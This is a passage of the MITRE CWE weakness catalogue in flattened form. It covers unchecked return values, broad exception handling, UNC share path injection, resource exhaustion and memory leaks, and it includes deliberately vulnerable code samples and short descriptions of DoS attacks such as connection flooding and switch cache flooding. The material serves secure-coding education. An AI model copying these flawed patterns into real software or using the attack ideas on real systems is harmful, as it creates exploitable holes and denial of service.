legitimate for the function, but is not expected by the software. - - - - - - - - - Architecture and Design - - - Implementation - - - - - Integrity - Other - Unexpected State - Alter Execution Logic - - - - - CVE-2004-1395 - Certain packets (zero byte and other lengths) cause a recvfrom call to produce an unexpected return code that causes a server's listening loop to exit. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1395 - - - CVE-2002-2124 - Unchecked return code from recv() leads to infinite loop. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2124 - - - CVE-2005-2553 - Kernel function does not properly handle when a null is returned by a function call, causing it to call another function that it shouldn't. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2553 - - - CVE-2005-1858 - Memory not properly cleared when read() function call returns fewer bytes than expected. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1858 - - - CVE-2000-0536 - Bypass access restrictions when connecting from IP whose DNS reverse lookup does not return a hostname. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0536 - - - CVE-2001-0910 - Bypass access restrictions when connecting from IP whose DNS reverse lookup does not return a hostname. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0910 - - - CVE-2004-2371 - Game server doesn't check return values for functions that handle text strings and associated size values. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2371 - - - CVE-2005-1267 - Resultant infinite loop when function call returns -1 value. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1267 - - - - - Unexpected Status Code or Return Value - - - SFP4 - Unchecked Status Condition - - - EXP00-PL - Do not return undef - Imprecise - - - - Usually primary, but can be resultant from issues such as behavioral change or API abuse. This can produce resultant vulnerabilities. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-03-10 - updated Relationships - - - CWE Content Team - MITRE - 2009-12-28 - updated Other_Notes, Relationship_Notes - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Relationships - - - - - Catching NullPointerException should not be used as an alternative to programmatic checks to prevent dereferencing a null pointer. - - Programmers typically catch NullPointerException under three circumstances: - - - The program contains a null pointer dereference. Catching the resulting exception was easier than fixing the underlying problem. - The program explicitly throws a NullPointerException to signal an error condition. - The code is part of a test harness that supplies unexpected input to the classes under test. - - - Of these three circumstances, only the last is acceptable. - - - - - - - - - - - Implementation - - - - - Availability - DoS: Resource Consumption (CPU) - - - - - Automated Static Analysis - Binary or Bytecode - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Bytecode Weakness Analysis - including disassembler + source code weakness analysis - Binary Weakness Analysis - including disassembler + source code weakness analysis - - - - - SOAR Partial - - - Dynamic Analysis with Manual Results Interpretation - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Framework-based Fuzzer - - - - - SOAR Partial - - - Manual Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Manual Source Code Review (not inspections) - - - - - SOAR Partial - - - Automated Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Source code Weakness Analyzer - Context-configured Source Code Weakness Analyzer - - - - - High - - - Architecture or Design Review - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Formal Methods / Correct-By-Construction - - - Cost effective for partial coverage: - - - Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) - - - - - High - - - - - Architecture and Design - Implementation - Do not extensively rely on catching exceptions (especially for validating user input) to handle errors. Handling exceptions can decrease the performance of an application. - - - - - The following code mistakenly catches a NullPointerException. - - try {mysteryMethod();} catch (NullPointerException npe) { - - } - - - - - - Catching NullPointerException - - - ERR08-J - Do not catch NullPointerException or any of its ancestors - - - - - - - - 7 Pernicious Kingdoms - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-03-10 - updated Relationships - - - CWE Content Team - MITRE - 2009-05-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-03-29 - updated Other_Notes, Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-06-23 - updated Description, Other_Notes - - - CWE Content Team - MITRE - 2014-07-30 - updated Detection_Factors, Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated References - - Catch NullPointerException - - - - Catching overly broad exceptions promotes complex error handling code that is more likely to contain security vulnerabilities. - Multiple catch blocks can get ugly and repetitive, but "condensing" catch blocks by catching a high-level class like Exception can obscure exceptions that deserve special treatment or that should not be caught at this point in the program. Catching an overly broad exception essentially defeats the purpose of Java's typed exceptions, and can become particularly dangerous if the program grows and begins to throw new types of exceptions. The new exception types will not receive any attention. - - - - - - - - - - - - - Architecture and Design - - - Implementation - - - - - Non-Repudiation - Other - Hide Activities - Alter Execution Logic - - - - - The following code excerpt handles three types of exceptions in an identical fashion. - - try {doExchange();}catch (IOException e) {logger.error("doExchange failed", e);}catch (InvocationTargetException e) { - - logger.error("doExchange failed", e); - }catch (SQLException e) { - - logger.error("doExchange failed", e); - } - - At first blush, it may seem preferable to deal with these exceptions in a single catch block, as follows: - - try {doExchange();}catch (Exception e) {logger.error("doExchange failed", e);} - - However, if doExchange() is modified to throw a new type of exception that should be handled in some different kind of way, the broad catch block will prevent the compiler from pointing out the situation. Further, the new catch block will now also handle exceptions derived from RuntimeException such as ClassCastException, and NullPointerException, which is not the programmer's intent. - - - - - Overly-Broad Catch Block - - - SFP5 - Ambiguous Exception Type - - - ASCSM-CWE-396 - - - ASCRM-CWE-396 - - - - - - - - - - - 7 Pernicious Kingdoms - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-09-24 - Removed C from Applicable_Platforms - - - CWE Content Team - MITRE - 2008-10-14 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2009-03-10 - updated Relationships - - - CWE Content Team - MITRE - 2009-05-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2009-10-29 - updated Description, Other_Notes - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated References - - Overly-Broad Catch Block - - - - Throwing overly broad exceptions promotes complex error handling code that is more likely to contain security vulnerabilities. - Declaring a method to throw Exception or Throwable makes it difficult for callers to perform proper error handling and error recovery. Java's exception mechanism, for example, is set up to make it easy for callers to anticipate what can go wrong and write code to handle each specific exceptional circumstance. Declaring that a method throws a generic form of exception defeats this system. - - - - - - - - - - - - - Architecture and Design - - - Implementation - - - - - Non-Repudiation - Other - Hide Activities - Alter Execution Logic - - - - - The following method throws three types of exceptions. - - public void doExchange() throws IOException, InvocationTargetException, SQLException {...} - - While it might seem tidier to write - - public void doExchange() throws Exception {...} - - doing so hampers the caller's ability to understand and handle the exceptions that occur. Further, if a later revision of doExchange() introduces a new type of exception that should be treated differently than previous exceptions, there is no easy way to enforce this requirement. - - - Early versions of C++ (C++98, C++03, C++11) included a feature known as Dynamic Exception Specification. This allowed functions to declare what type of exceptions it may throw. It is possible to declare a general class of exception to cover any derived exceptions that may be throw. - - int myfunction() throw(std::exception) {if (0) throw out_of_range();throw length_error();} - - In the example above, the code declares that myfunction() can throw an exception of type "std::exception" thus hiding details about the possible derived exceptions that could potentially be thrown. - - - - - Overly-Broad Throws Declaration - - - ERR07-J - Do not throw RuntimeException, Exception, or Throwable - - - SFP5 - Ambiguous Exception Type - - - ASCSM-CWE-397 - - - ASCRM-CWE-397 - - - - - - - - - For C++, this weakness only applies to C++98, C++03, and C++11. It relies on a feature known as Dynamic Exception Specification, which was part of early versions of C++ but was deprecated in C++11. It has been removed for C++17 and later. - - - - 7 Pernicious Kingdoms - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-09-24 - Removed C from Applicable_Platforms - - - CWE Content Team - MITRE - 2008-10-14 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2009-03-10 - updated Relationships - - - CWE Content Team - MITRE - 2009-05-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2009-10-29 - updated Description, Other_Notes - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated Applicable_Platforms, Demonstrative_Examples, References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated References - - Overly-Broad Throws Declaration - - - - An attacker can inject a Windows UNC share ('\\UNC\share\name') into a software system to potentially redirect access to an unintended location or arbitrary file. - - - - - - - - - Implementation - - - - - Confidentiality - Integrity - Read Files or Directories - Modify Files or Directories - - - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as "/" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434. - Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering "/" is insufficient protection if the filesystem also supports the use of "\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if "../" sequences are removed from the ".../...//" string in a sequential fashion, two instances of "../" would be removed from the original string, but the remaining characters would still form the "../" string. - - High - - - Implementation - Input Validation - Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. - - - - - CVE-2001-0687 - FTP server allows a remote attacker to retrieve privileged web server system information by specifying arbitrary paths in the UNC format (\\computername\sharename). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0687 - - - - - '\\UNC\share\name\' (Windows UNC share) - - - SFP16 - Path Traversal - - - - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-07-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-06-21 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-03-29 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Observed_Examples, References, Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2020-02-24 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2021-03-15 - updated Potential_Mitigations - - Path Issue - Windows UNC Share - '\\UNC\share\name\' - - - - The software does not properly control the allocation and maintenance of a limited resource, thereby enabling an actor to influence the amount of resources consumed, eventually leading to the exhaustion of available resources. - - Limited resources include memory, file system storage, database connection pool entries, and CPU. If an attacker can trigger the allocation of these limited resources, but the number or size of the resources is not controlled, then the attacker could cause a denial of service that consumes all available resources. This would prevent valid users from accessing the software, and it could potentially have an impact on the surrounding environment. For example, a memory exhaustion attack against an application could slow down the application as well as its host operating system. - There are at least three distinct scenarios which can commonly lead to resource exhaustion: - - - Lack of throttling for the number of allocated resources - Losing all references to a resource before reaching the shutdown stage - Not closing/returning a resource after processing - - - Resource exhaustion problems are often result due to an incorrect implementation of the following situations: - - - Error conditions and other exceptional circumstances. - Confusion over which part of the program is responsible for releasing the resource. - - - - - - - - - - - - Resource Exhaustion - - - - - Operation - - - Architecture and Design - - - Implementation - - - High - - - Availability - DoS: Crash, Exit, or Restart - DoS: Resource Consumption (CPU) - DoS: Resource Consumption (Memory) - DoS: Resource Consumption (Other) - The most common result of resource exhaustion is denial of service. The software may slow down, crash due to unhandled errors, or lock out legitimate users. - - - Access Control - Other - Bypass Protection Mechanism - Other - In some cases it may be possible to force the software to "fail open" in the event of resource exhaustion. The state of the software -- and possibly the security functionality - may then be compromised. - - - - - Automated Static Analysis - - Automated static analysis typically has limited utility in recognizing resource exhaustion problems, except for program-independent system resources such as files, sockets, and processes. For system resources, automated static analysis may be able to detect circumstances in which resources are not released after they have expired. Automated analysis of configuration files may be able to detect settings that do not specify a maximum value. - Automated static analysis tools will not be appropriate for detecting exhaustion of custom resources, such as an intended security policy in which a bulletin board user is only allowed to make a limited number of posts per day. - - Limited - - - Automated Dynamic Analysis - Certain automated dynamic analysis techniques may be effective in spotting resource exhaustion problems, especially with resources such as processes, memory, and connections. The technique may involve generating a large number of requests to the software within a short time frame. - Moderate - - - Fuzzing - While fuzzing is typically geared toward finding low-level implementation bugs, it can inadvertently find resource exhaustion problems. This can occur when the fuzzer generates a large number of test cases but does not restart the targeted software in between test cases. If an individual test case produces a crash, but it does not do so reliably, then an inability to handle resource exhaustion may be the cause. - Opportunistic - - - - - Architecture and Design - Design throttling mechanisms into the system architecture. The best protection is to limit the amount of resources that an unauthorized user can cause to be expended. A strong authentication and access control model will help prevent such attacks from occurring in the first place. The login application should be protected against DoS attacks as much as possible. Limiting the database access, perhaps by caching result sets, can help minimize the resources expended. To further limit the potential for a DoS attack, consider tracking the rate of requests received from users and blocking requests that exceed a defined rate threshold. - - - Architecture and Design - - Mitigation of resource exhaustion attacks requires that the target system either: - - - recognizes the attack and denies that user further access for a given amount of time, or - uniformly throttles all requests in order to make it more difficult to consume resources more quickly than they can again be freed. - - - The first of these solutions is an issue in itself though, since it may allow attackers to prevent the use of the system by a particular valid user. If the attacker impersonates the valid user, they may be able to prevent the user from accessing the server in question. - The second solution is simply difficult to effectively institute -- and even when properly done, it does not provide a full solution. It simply makes the attack require more resources on the part of the attacker. - - - - Architecture and Design - Ensure that protocols have specific limits of scale placed on them. - - - Implementation - Ensure that all failures in resource allocation place the system into a safe posture. - - - - - The following example demonstrates the weakness. - - class Worker implements Executor { - ...public void execute(Runnable r) { - - try {...}catch (InterruptedException ie) { - - - // postpone response - Thread.currentThread().interrupt(); - } - } - public Worker(Channel ch, int nworkers) {...} - protected void activate() { - - Runnable loop = new Runnable() { - - public void run() { - - try {for (;;) {Runnable r = ...;r.run();}}catch (InterruptedException ie) {...} - } - };new Thread(loop).start(); - } - } - - There are no limits to runnables. Potentially an attacker could cause resource problems very quickly. - - - This code allocates a socket and forks each time it receives a new connection. - - sock=socket(AF_INET, SOCK_STREAM, 0);while (1) {newsock=accept(sock, ...);printf("A connection has been accepted\n");pid = fork();} - - The program does not track how many connections have been made, and it does not limit the number of connections. Because forking is a relatively expensive operation, an attacker would be able to cause the system to run out of CPU, processes, or memory by making a large number of connections. Alternatively, an attacker could consume all available connections, preventing others from accessing the system remotely. - - - In the following example a server socket connection is used to accept a request to store data on the local file system using a specified filename. The method openSocketConnection establishes a server socket to accept requests from a client. When a client establishes a connection to this service the getNextMessage method is first used to retrieve from the socket the name of the file to store the data, the openFileToWrite method will validate the filename and open a file to write to on the local file system. The getNextMessage is then used within a while loop to continuously read data from the socket and output the data to the file until there is no longer any data from the socket. - - int writeDataFromSocketToFile(char *host, int port){ - - char filename[FILENAME_SIZE];char buffer[BUFFER_SIZE];int socket = openSocketConnection(host, port); - if (socket < 0) {printf("Unable to open socket connection");return(FAIL);}if (getNextMessage(socket, filename, FILENAME_SIZE) > 0) { - if (openFileToWrite(filename) > 0) { - while (getNextMessage(socket, buffer, BUFFER_SIZE) > 0){if (!(writeToFile(buffer) > 0))break; - } - }closeFile(); - }closeSocket(socket); - } - - This example creates a situation where data can be dumped to a file on the local file system without any limits on the size of the file. This could potentially exhaust file or disk resources and/or limit other clients' ability to access the service. - - - In the following example, the processMessage method receives a two dimensional character array containing the message to be processed. The two-dimensional character array contains the length of the message in the first character array and the message body in the second character array. The getMessageLength method retrieves the integer value of the length from the first character array. After validating that the message length is greater than zero, the body character array pointer points to the start of the second character array of the two-dimensional character array and memory is allocated for the new body character array. - - - - /* process message accepts a two-dimensional character array of the form [length][body] containing the message to be processed */ - int processMessage(char **message){ - char *body; - int length = getMessageLength(message[0]); - if (length > 0) {body = &message[1][0];processMessageBody(body);return(SUCCESS);}else {printf("Unable to process message; invalid message length");return(FAIL);} - } - - This example creates a situation where the length of the body character array can be very large and will consume excessive memory, exhausting system resources. This can be avoided by restricting the length of the second character array with a maximum length check - Also, consider changing the type from 'int' to 'unsigned int', so that you are always guaranteed that the number is positive. This might not be possible if the protocol specifically requires allowing negative values, or if you cannot control the return value from getMessageLength(), but it could simplify the check to ensure the input is positive, and eliminate other errors such as signed-to-unsigned conversion errors (CWE-195) that may occur elsewhere in the code. - - unsigned int length = getMessageLength(message[0]);if ((length > 0) && (length < MAX_LENGTH)) {...} - - - - In the following example, a server object creates a server socket and accepts client connections to the socket. For every client connection to the socket a separate thread object is generated using the ClientSocketThread class that handles request made by the client through the socket. - - public void acceptConnections() { - - try {ServerSocket serverSocket = new ServerSocket(SERVER_PORT);int counter = 0;boolean hasConnections = true;while (hasConnections) {Socket client = serverSocket.accept();Thread t = new Thread(new ClientSocketThread(client));t.setName(client.getInetAddress().getHostName() + ":" + counter++);t.start();}serverSocket.close(); - - } catch (IOException ex) {...} - } - - In this example there is no limit to the number of client connections and client threads that are created. Allowing an unlimited number of client connections and threads could potentially overwhelm the system and system resources. - The server should limit the number of client connections and the client threads that are created. This can be easily done by creating a thread pool object that limits the number of threads that are generated. - - public static final int SERVER_PORT = 4444;public static final int MAX_CONNECTIONS = 10;... - public void acceptConnections() { - - try {ServerSocket serverSocket = new ServerSocket(SERVER_PORT);int counter = 0;boolean hasConnections = true;while (hasConnections) {hasConnections = checkForMoreConnections();Socket client = serverSocket.accept();Thread t = new Thread(new ClientSocketThread(client));t.setName(client.getInetAddress().getHostName() + ":" + counter++);ExecutorService pool = Executors.newFixedThreadPool(MAX_CONNECTIONS);pool.execute(t);}serverSocket.close(); - - } catch (IOException ex) {...} - } - - - - - - CVE-2009-2874 - Product allows attackers to cause a crash via a large number of connections. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2874 - - - CVE-2009-1928 - Malformed request triggers uncontrolled recursion, leading to stack exhaustion. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1928 - - - CVE-2009-2858 - Chain: memory leak (CWE-404) leads to resource exhaustion. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2858 - - - CVE-2009-2726 - Driver does not use a maximum width when invoking sscanf style functions, causing stack consumption. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2726 - - - CVE-2009-2540 - Large integer value for a length property in an object causes a large amount of memory allocation. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2540 - - - CVE-2009-2299 - Web application firewall consumes excessive memory when an HTTP request contains a large Content-Length value but no POST data. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2299 - - - CVE-2009-2054 - Product allows exhaustion of file descriptors when processing a large number of TCP packets. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2054 - - - CVE-2008-5180 - Communication product allows memory consumption with a large number of SIP requests, which cause many sessions to be created. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5180 - - - CVE-2008-2121 - TCP implementation allows attackers to consume CPU and prevent new connections using a TCP SYN flood attack. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2121 - - - CVE-2008-2122 - Port scan triggers CPU consumption with processes that attempt to read data from closed sockets. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2122 - - - CVE-2008-1700 - Product allows attackers to cause a denial of service via a large number of directives, each of which opens a separate window. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1700 - - - CVE-2007-4103 - Product allows resource exhaustion via a large number of calls that do not complete a 3-way handshake. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4103 - - - CVE-2006-1173 - Mail server does not properly handle deeply nested multipart MIME messages, leading to stack exhaustion. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1173 - - - CVE-2007-0897 - Chain: anti-virus product encounters a malformed file but returns from a function without closing a file descriptor (CWE-775) leading to file descriptor consumption (CWE-400) and failed scans. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0897 - - - - - Resource exhaustion (file descriptor, disk space, sockets, ...) - - - A9 - Denial of Service - CWE More Specific - - - 10 - Denial of Service - - - 41 - XML Attribute Blowup - - - SER12-J - Avoid memory and resource leaks during serialization - - - MSC05-J - Do not exhaust heap space - - - SFP13 - Unrestricted Consumption - - - - - - - - - - - - - - - - "Resource consumption" could be interpreted as a consequence instead of an insecure behavior, so this entry is being considered for modification. It appears to be referenced too frequently when more precise mappings are available. Some of its children, such as CWE-771, might be better considered as a chain. - Vulnerability theory is largely about how behaviors and resources interact. "Resource exhaustion" can be regarded as either a consequence or an attack, depending on the perspective. This entry is an attempt to reflect the underlying weaknesses that enable these attacks (or consequences) to take place. - - Database queries that take a long time to process are good DoS targets. An attacker would have to write a few lines of Perl code to generate enough traffic to exceed the site's ability to keep up. This would effectively prevent authorized users from using the site at all. Resources can be exploited simply by ensuring that the target machine must do much more work and consume more resources in order to service a request than the attacker must do to initiate a request. - A prime example of this can be found in old switches that were vulnerable to "macof" attacks (so named for a tool developed by Dugsong). These attacks flooded a switch with random IP and MAC address combinations, therefore exhausting the switch's cache, which held the information of which port corresponded to which MAC addresses. Once this cache was exhausted, the switch would fail in an insecure way and would begin to act simply as a hub, broadcasting all traffic on all ports and allowing for basic sniffing attacks. - - - - - CLASP - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - Veracode - 2008-08-15 - Suggested OWASP Top Ten 2004 mapping - - - CWE Content Team - MITRE - 2008-09-08 - updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Description, Name, Relationships - - - CWE Content Team - MITRE - 2009-01-12 - updated Description - - - CWE Content Team - MITRE - 2009-05-27 - updated Name, Relationships - - - CWE Content Team - MITRE - 2009-07-27 - updated Description, Relationships - - - CWE Content Team - MITRE - 2009-10-29 - updated Relationships - - - CWE Content Team - MITRE - 2009-12-28 - updated Common_Consequences, Demonstrative_Examples, Detection_Factors, Likelihood_of_Exploit, Observed_Examples, Other_Notes, Potential_Mitigations, References - - - CWE Content Team - MITRE - 2010-02-16 - updated Detection_Factors, Potential_Mitigations, References, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2010-04-05 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2010-06-21 - updated Description - - - CWE Content Team - MITRE - 2010-09-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Demonstrative_Examples, Related_Attack_Patterns, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2013-07-17 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2015-12-07 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Demonstrative_Examples, Likelihood_of_Exploit, Potential_Mitigations, References, Relationships - - - CWE Content Team - MITRE - 2018-03-27 - updated References, Type - - - CWE Content Team - MITRE - 2019-01-03 - updated Alternate_Terms, Description, Name, Relationships, Taxonomy_Mappings, Theoretical_Notes - - - CWE Content Team - MITRE - 2019-06-20 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2019-09-19 - updated Description, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, References, Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Description, Maintenance_Notes - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - Resource Exhaustion - Uncontrolled Resource Consumption (aka 'Resource Exhaustion') - Uncontrolled Resource Consumption ('Resource Exhaustion') - - - - The software does not sufficiently track and release allocated memory after it has been used, which slowly consumes remaining memory. - This is often triggered by improper handling of malformed data or unexpectedly interrupted sessions. In some languages, developers are responsible for tracking memory allocation and releasing the memory. If there are no more pointers or references to the memory, then it can no longer be tracked and identified for release. - - - - - - - - Resultant - - - - - - - - - Memory Leak - - - - - Architecture and Design - - - Implementation - - Memory leaks have two common and sometimes overlapping causes: - - - Error conditions and other exceptional circumstances - Confusion over which part of the program is responsible for freeing the memory - - - - - - Medium - - - Availability - DoS: Crash, Exit, or Restart - DoS: Instability - DoS: Resource Consumption (CPU) - DoS: Resource Consumption (Memory) - Most memory leaks result in general software reliability problems, but if an attacker can intentionally trigger a memory leak, the attacker might be able to launch a denial of service attack (by crashing or hanging the program) or take advantage of other unexpected program behavior resulting from a low memory condition. - - - Other - Reduce Performance - - - - - Implementation - Libraries or Frameworks - - Choose a language or tool that provides automatic memory management, or makes manual memory management less error-prone. - For example, glibc in Linux provides protection against free of invalid pointers. - When using Xcode to target OS X or iOS, enable automatic reference counting (ARC) [REF-391]. - To help correctly and consistently manage memory when programming in C++, consider using a smart pointer class such as std::auto_ptr (defined by ISO/IEC ISO/IEC 14882:2003), std::shared_ptr and std::unique_ptr (specified by an upcoming revision of the C++ standard, informally referred to as C++ 1x), or equivalent solutions such as Boost. - - - - Architecture and Design - Use an abstraction library to abstract away risky APIs. Not a complete solution. - - - Architecture and Design - Build and Compilation - The Boehm-Demers-Weiser Garbage Collector or valgrind can be used to detect leaks in code. - This is not a complete solution as it is not 100% effective. - - - - - The following C function leaks a block of allocated memory if the call to read() does not return the expected number of bytes: - - char* getBlock(int fd) { - char* buf = (char*) malloc(BLOCK_SIZE);if (!buf) {return NULL;}if (read(fd, buf, BLOCK_SIZE) != BLOCK_SIZE) { - - return NULL; - }return buf; - } - - - - - - CVE-2005-3119 - Memory leak because function does not free() an element of a data structure. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3119 - - - CVE-2004-0427 - Memory leak when counter variable is not decremented. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0427 - - - CVE-2002-0574 - chain: reference count is not decremented, leading to memory leak in OS by sending ICMP packets. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0574 - - - CVE-2005-3181 - Kernel uses wrong function to release a data structure, preventing data from being properly tracked by other code. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3181 - - - CVE-2004-0222 - Memory leak via unknown manipulations as part of protocol test suite. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0222 - - - CVE-2001-0136 - Memory leak via a series of the same command. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0136 - - - - Memory Management - - - Memory - - - - Memory leak - - - Memory Leak - - - Failure to deallocate data - - - A9 - Denial of Service - CWE More Specific - - - MEM31-C - Free dynamically allocated memory when no longer needed - Exact - - - MSC04-J - Do not leak memory - - - SFP38 - Failure to Release Memory - - - ASCPEM-PRF-14 - - - - - - - - - - This is often a resultant weakness due to improper handling of malformed data or early termination of sessions. - "memory leak" has sometimes been used to describe other kinds of issues, e.g. for information leaks in which the contents of memory are inadvertently leaked (CVE-2003-0400 is one such example of this terminology conflict). - - - - PLOVER - 2006-07-19 - - - 